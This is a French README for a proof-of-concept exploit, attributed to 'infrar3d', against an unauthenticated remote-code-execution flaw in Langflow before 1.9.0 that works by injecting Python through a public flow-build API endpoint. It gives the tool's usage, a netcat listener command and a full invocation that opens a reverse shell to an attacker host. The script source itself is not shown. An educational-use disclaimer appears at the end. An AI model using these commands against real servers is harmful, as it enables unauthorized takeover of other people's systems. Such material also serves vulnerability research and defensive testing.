
Exploit CVE-2026-33017 | par infrar3d
xpl0ité par infrar3d
Cette preuve de concept cible une vulnérabilité critique d'exécution de code à distance (RCE) dans les versions de Langflow antérieures à 1.9.0. La vulnérabilité permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires en injectant du code Python malveillant via le point de terminaison de l'API de construction de flux. La vulnérabilité réside dans le point de terminaison /api/v1/build_public_tmp/{flow_id}/flow, qui n'assainit pas correctement le code fourni par l'utilisateur dans le champ code des modèles de composants.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
Le premier terminal (écouteur) :
nc -lvnp 4444
Le second terminal (exploit) :
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Ce logiciel et ce code de preuve de concept sont fournis uniquement à des fins éducatives et de recherche.
Vous êtes responsable du respect de toutes les lois applicables. Utilisez de manière éthique et responsable.